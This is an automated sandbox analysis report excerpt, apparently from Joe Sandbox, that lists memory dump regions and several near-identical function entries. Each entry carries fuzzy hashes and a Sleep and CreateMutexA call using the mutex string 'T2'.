Associated: 00000001.00000002.2196803010.0000000001046000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196861541.0000000001060000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196929723.0000000001062000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197025606.0000000001064000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197025606.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197226626.0000000001071000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197274526.0000000001072000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197319993.0000000001073000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197336056.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197351405.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197368124.0000000001077000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197387878.0000000001087000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197406058.0000000001088000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197421861.0000000001090000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197436156.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197456283.000000000109B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197483072.00000000010B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197496941.00000000010B1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197511577.00000000010B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197534330.00000000010CE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197552110.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197573093.00000000010D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197588614.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197603661.00000000010DA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197621231.00000000010DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197636461.00000000010DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197652075.00000000010E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197667145.00000000010EC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197684755.00000000010ED000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197701941.00000000010F5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197721155.00000000010F9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197741991.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197758687.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197778523.0000000001123000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197793728.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197793728.0000000001148000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197836095.0000000001175000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197852578.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197867704.0000000001177000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197888161.000000000117D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197904103.000000000117F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197921784.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197937546.000000000118F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e70000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2
API String ID: 1464230837-631260391
Opcode ID: 63fdde9ba058ef6e36f1772983d5b277192e6d8ec28d771ca4ae31661cb3e350
Instruction ID: b095bd39e71afaa3f50124e6152bd9a4079c8bb3921bc7a523ca4f4b16ab3f7b
Opcode Fuzzy Hash: 63fdde9ba058ef6e36f1772983d5b277192e6d8ec28d771ca4ae31661cb3e350
Instruction Fuzzy Hash: F13125717041048BEB18EB78EC897ADB762EFC5320F28962DE01CF72D1D73589848752

Function 00E7A079 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 136
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00E7A963
CreateMutexA.KERNEL32(00000000,00000000,00ED3254), ref: 00E7A981

Strings

T2, xrefs: 00E7A970

Memory Dump Source

Source File: 00000001.00000002.2196086802.0000000000E71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000001.00000002.2196066173.0000000000E70000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196086802.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196175328.0000000000ED9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196190868.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196209795.0000000000EE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196754597.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196803010.0000000001046000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196861541.0000000001060000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196929723.0000000001062000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197025606.0000000001064000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197025606.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197226626.0000000001071000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197274526.0000000001072000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197319993.0000000001073000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197336056.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197351405.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197368124.0000000001077000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197387878.0000000001087000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197406058.0000000001088000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197421861.0000000001090000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197436156.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197456283.000000000109B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197483072.00000000010B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197496941.00000000010B1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197511577.00000000010B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197534330.00000000010CE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197552110.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197573093.00000000010D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197588614.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197603661.00000000010DA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197621231.00000000010DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197636461.00000000010DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197652075.00000000010E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197667145.00000000010EC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197684755.00000000010ED000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197701941.00000000010F5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197721155.00000000010F9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197741991.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197758687.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197778523.0000000001123000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197793728.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197793728.0000000001148000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197836095.0000000001175000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197852578.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197867704.0000000001177000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197888161.000000000117D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197904103.000000000117F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197921784.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197937546.000000000118F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e70000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2
API String ID: 1464230837-631260391
Opcode ID: fa2146ceba02bd634ac8c98a628912d966933a135b7a4038a7109e9bce2cda2c
Instruction ID: 707218d82ed6092f0b3c481c5585de080990d1f84dc6d15feb7a1b4780e17b50
Opcode Fuzzy Hash: fa2146ceba02bd634ac8c98a628912d966933a135b7a4038a7109e9bce2cda2c
Instruction Fuzzy Hash: A2312371B051009BEB08EB78ED89B6DB762DBC5324F289628E01CB72D1D7369984C756

Function 00E7A1AE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00E7A963
CreateMutexA.KERNEL32(00000000,00000000,00ED3254), ref: 00E7A981

Strings

T2, xrefs: 00E7A970

Memory Dump Source

Source File: 00000001.00000002.2196086802.0000000000E71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000001.00000002.2196066173.0000000000E70000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196086802.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196175328.0000000000ED9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196190868.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196209795.0000000000EE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196754597.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196803010.0000000001046000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196861541.0000000001060000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196929723.0000000001062000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197025606.0000000001064000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197025606.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197226626.0000000001071000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197274526.0000000001072000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197319993.0000000001073000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197336056.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197351405.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197368124.0000000001077000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197387878.0000000001087000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197406058.0000000001088000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197421861.0000000001090000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197436156.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197456283.000000000109B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197483072.00000000010B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197496941.00000000010B1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197511577.00000000010B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197534330.00000000010CE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197552110.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197573093.00000000010D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197588614.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197603661.00000000010DA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197621231.00000000010DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197636461.00000000010DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197652075.00000000010E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197667145.00000000010EC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197684755.00000000010ED000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197701941.00000000010F5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197721155.00000000010F9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197741991.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197758687.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197778523.0000000001123000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197793728.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197793728.0000000001148000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197836095.0000000001175000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197852578.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197867704.0000000001177000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197888161.000000000117D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197904103.000000000117F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197921784.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197937546.000000000118F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e70000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2
API String ID: 1464230837-631260391
Opcode ID: 3168f323fb2b3a2782b49e4f7f4d55c1ad1d004b7f0f714497cd43108a118933
Instruction ID: 2d31be7c14db9a43388255f07dae6602371a2eb77bf874e88cb26b1f44a1d6b4
Opcode Fuzzy Hash: 3168f323fb2b3a2782b49e4f7f4d55c1ad1d004b7f0f714497cd43108a118933
Instruction Fuzzy Hash: 75314871B051409BEB08EB78EC8D76DB762EBC6310F28972CE01CB72E1D73689848756

Function 00E7A418 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00E7A963
CreateMutexA.KERNEL32(00000000,00000000,00ED3254), ref: 00E7A981

Strings

T2, xrefs: 00E7A970

Memory Dump Source

Source File: 00000001.00000002.2196086802.0000000000E71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000001.00000002.2196066173.0000000000E70000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196086802.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196175328.0000000000ED9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196190868.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196209795.0000000000EE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196754597.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196803010.0000000001046000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196861541.0000000001060000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196929723.0000000001062000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197025606.0000000001064000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197025606.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197226626.0000000001071000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197274526.0000000001072000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197319993.0000000001073000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197336056.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197351405.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197368124.0000000001077000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197387878.0000000001087000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197406058.0000000001088000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197421861.0000000001090000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197436156.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197456283.000000000109B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197483072.00000000010B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197496941.00000000010B1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197511577.00000000010B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197534330.00000000010CE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197552110.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197573093.00000000010D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197588614.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197603661.00000000010DA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197621231.00000000010DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197636461.00000000010DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197652075.00000000010E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197667145.00000000010EC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197684755.00000000010ED000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197701941.00000000010F5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197721155.00000000010F9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197741991.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197758687.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197778523.0000000001123000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197793728.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197793728.0000000001148000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197836095.0000000001175000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197852578.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197867704.0000000001177000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197888161.000000000117D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197904103.000000000117F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197921784.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197937546.000000000118F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e70000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2
API String ID: 1464230837-631260391
Opcode ID: aee317cbc463f04e706c56cc52c05a84bcb87eb13bed2c2017ce6b2b49851f9a
Instruction ID: 877b5b68257a49456ca1534a8014ae65149692f31bde2ed08f6d9cd35b304e86
Opcode Fuzzy Hash: aee317cbc463f04e706c56cc52c05a84bcb87eb13bed2c2017ce6b2b49851f9a
Instruction Fuzzy Hash: C1316E717041009BEB08EB78ECCD76DB761DFC5324F28A628E01CBB2D5E77659848756

Function 00E7A54D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00E7A963
CreateMutexA.KERNEL32(00000000,00000000,00ED3254), ref: 00E7A981

Strings

T2, xrefs: 00E7A970

Memory Dump Source

Source File: 00000001.00000002.2196086802.0000000000E71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000001.00000002.2196066173.0000000000E70000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196086802.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196175328.0000000000ED9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196190868.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196209795.0000000000EE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196754597.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196803010.0000000001046000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196861541.0000000001060000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196929723.0000000001062000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197025606.0000000001064000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197025606.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197226626.0000000001071000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197274526.0000000001072000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197319993.0000000001073000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197336056.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197351405.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197368124.0000000001077000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197387878.0000000001087000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197406058.0000000001088000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197421861.0000000001090000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197436156.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197456283.000000000109B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197483072.00000000010B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197496941.00000000010B1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197511577.00000000010B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197534330.00000000010CE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197552110.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197573093.00000000010D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197588614.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197603661.00000000010DA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197621231.00000000010DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197636461.00000000010DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197652075.00000000010E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197667145.00000000010EC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197684755.00000000010ED000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197701941.00000000010F5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197721155.00000000010F9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197741991.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197758687.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197778523.0000000001123000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197793728.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197793728.0000000001148000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197836095.0000000001175000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197852578.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197867704.0000000001177000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197888161.000000000117D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197904103.000000000117F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197921784.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197937546.000000000118F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e70000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2
API String ID: 1464230837-631260391
Opcode ID: 2a55ed751b2994a6fc7c34ef5e95307c146d29049dc4bcabf36419d5298e47f6
Instruction ID: 55e7d2b328739a9516587d9455d8b68ba5fb183c832ba5fb00a08c38771eab97
Opcode Fuzzy Hash: 2a55ed751b2994a6fc7c34ef5e95307c146d29049dc4bcabf36419d5298e47f6
Instruction Fuzzy Hash: 813139717041008BEB08EB78ECC976DB762EBC5324F28962CE01CBB2D1C73589858712

Function 00E7A682 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 131
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00E7A963
CreateMutexA.KERNEL32(00000000,00000000,00ED3254), ref: 00E7A981

Strings

T2, xrefs: 00E7A970

Memory Dump Source

Source File: 00000001.00000002.2196086802.0000000000E71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000001.00000002.2196066173.0000000000E70000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196086802.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196175328.0000000000ED9000.00000004.00000001.01000000.00000003.sdmpDownload File
